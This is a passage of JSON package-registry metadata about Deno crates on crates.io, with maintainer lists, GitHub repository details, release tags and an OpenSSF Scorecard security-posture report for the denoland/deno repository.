i/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:36.252Z","updated_at":"2022-11-07T18:29:36.252Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.937Z","updated_at":"2023-07-18T22:41:28.937Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4046935,"name":"deno_3p_lib","ecosystem":"cargo","description":"Provides the deno executable","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2021-03-29T20:04:59.714Z","latest_release_published_at":"2022-09-12T21:30:38.031Z","latest_release_number":"1.25.2","last_synced_at":"2026-09-07T22:58:59.185Z","created_at":"2022-04-12T09:57:31.533Z","updated_at":"2026-09-07T22:58:59.186Z","registry_url":"https://crates.io/crates/deno_3p_lib/","install_command":"cargo install deno_3p_lib","documentation_url":"https://docs.rs/deno_3p_lib/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8